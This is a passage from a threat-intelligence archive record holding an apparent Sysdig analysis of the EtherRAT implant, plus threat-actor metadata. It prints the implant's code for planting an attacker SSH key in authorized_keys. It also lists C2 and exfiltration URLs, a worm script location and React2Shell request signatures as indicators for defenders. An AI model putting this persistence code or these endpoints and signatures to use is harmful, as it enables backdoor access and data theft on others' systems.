AAAAB3NzaC1yc2EAAAADAQABAAACAQDF...IFKa4w== root@vps';\r\nconst sshDir = path.join(os.homedir(), '.ssh');\r\nconst authKeysPath = path.join(sshDir, 'authorized_keys');\r\n// Create .ssh directory if missing (with correct 700 permissions)\r\nif (!fsSync.existsSync(sshDir)) {\r\n await fs.mkdir(sshDir, { mode: 0o700 });\r\n}\r\n// Append key if not already present\r\nif (!existingKeys.includes(publicKey.trim())) {\r\n await fs.writeFile(authKeysPath, existingKeys + '\\n' + publicKey, { mode: 0o600 });\r\n}\r\nThe implementation is non-destructive. It appends to existing authorized keys rather than overwriting, avoiding\r\ndisruption to legitimate access that might alert administrators. The payload creates the .ssh directory with\r\n0o700 permissions and writes authorized_keys with 0o600 , matching OpenSSH's expected permission\r\nmodel.\r\nSSH key IOC:\r\nFingerprint: SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\r\nComment: root@vps\r\nAny system with this key in an authorized_keys file should be considered compromised. The full public key is\r\nincluded in the IOCs section below.\r\nIndicators of compromise\r\nEthereum infrastructure\r\nType Value\r\nSmart contract 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4\r\nDeployer wallet 0xe941a9b283006f5163ee6b01c1f23aa5951c4c8d\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 18 of 21\n\nType Value\r\nFunding wallet 0x14afddd627fb0e039365554f8bbdb881ecb1c708\r\nC2 Servers\r\nIP Address Port Purpose\r\n91.215.85.42 3000 Primary C2 (recon, credentials)\r\n173.249.8.102 80 Secondary C2\r\n193.24.123.68 3001 Worm payload delivery\r\nURLs\r\nhttp://91.215.85.42:3000/{hwid} # Recon exfiltration\r\nhttp://91.215.85.42:3000/crypto/keys # Credential exfiltration\r\nhttp://193.24.123.68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh # Worm shell script\r\nhttps://grabify.link/SEFKGU # IP logger (briefly used)\r\nhttps://webhook.site/63575795-ee27-4b29-a15d-e977e7dc8361 # Web hijacker exfil\r\nWeb hijacker target\r\nxss.pro\r\nSSH backdoor key\r\nFingerprint: SHA256:1RquAvdtW48Ken6IVUZi/o4liu1SXlvezhgjb2fnvBg\r\nComment: root@vps\r\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDFTxaWmhQkYYF2LgNsAumFqxUiUSv8YEd7DRE9Wb076YxY0fGn4scWzmQnIP/xsrynapcrGKhB\r\nFilesystem artifacts\r\nPath Description\r\n/tmp/nextjs_scan.log Worm scan results\r\n/etc/nginx/sites-enabled/*.bak Backup of original nginx configs\r\n/etc/nginx/conf.d/*.bak Backup of original nginx configs\r\n/etc/apache2/sites-available/*.disabled Disabled Apache vhosts\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 19 of 21\n\nPath Description\r\n/etc/apache2/sites-available/000-redirect.conf Apache hijacker config\r\n~/.ssh/authorized_keys SSH backdoor persistence\r\nNetwork signatures\r\nWorm scanning:\r\nHigh-volume connections to ports 80, 443, 3000, 3001, 8080, 8443\r\nIncludes private IP ranges (10.x, 172.16-31.x, 192.168.x)\r\nReact2Shell exploit:\r\nHTTP requests with Next-Action header (40 random alphanumeric characters)\r\nPOST body containing $1:__proto__:then (prototype pollution signature)\r\nRecon exfiltration:\r\nPOST requests to /{hwid} endpoint where hwid matches the pattern of a hardware identifier\r\nCIS country exclusion\r\nThe reconnaissance payload self-terminates if the system locale matches:\r\nru, be, kk, ky, tg, uz, hy, az, ka\r\n(Russia, Belarus, Kazakhstan, Kyrgyzstan, Tajikistan, Uzbekistan, Armenia, Azerbaijan, Georgia)\r\nConclusion\r\nEtherRAT demonstrates how threat actors can combine commodity techniques into an effective multi-stage\r\nimplant. The blockchain C2 provides resilience against takedowns while creating an immutable audit trail that\r\nworks against the attacker. The payload collection covers the full spectrum: reconnaissance for target evaluation,\r\ncredential harvesting for financial theft, worm propagation for expanding access, web server hijacking for traffic\r\nmonetization, and SSH keys for persistent access independent of C2.\r\nHowever, EtherRAT attribution remains complicated. The Sysdig TRT's initial reporting assessed a probability of\r\nDPRK-nexus activity based on AES-256-CBC loader patterns seen in Contagious Interview campaigns without\r\nbeing able to compare code between the campaigns. The CIS country exclusion, xss.pro redirects, and\r\nwebhook.site exfiltration, more commonly associated with Russian-speaking threat actors, contradicts the team’s\r\ninitial North Korean attribution. Taken together, attribution evidence suggests either a CIS-based operator, shared\r\ntooling, or deliberate false flags. \r\nWhat remains clear is that React2Shell exploitation is actively being weaponized, and organizations running\r\nvulnerable Next.js deployments face threats from multiple actors.\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 20 of 21\n\nAbout the author\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nhttps://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2\r\nPage 21 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.sysdig.com/blog/etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2" ], "report_names": [ "etherrat-dissected-how-a-react2shell-implant-delivers-5-payloads-through-blockchain-c2" ], "threat_actors": [ { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7", "created_at": "2022-10-25T16:07:23.704358Z", "updated_at": "2026-04-10T02:00:04.718034Z", "deleted_at": null, "main_name": "Harvester", "aliases": [], "source_name": "ETDA:Harvester", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "Graphon", "Metasploit", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434310, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.pdf", "text": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.txt", "img": "https://archive.orkl.eu/1137e8b9cb61c71a76fa284aff924e4f6936f935.jpg" } }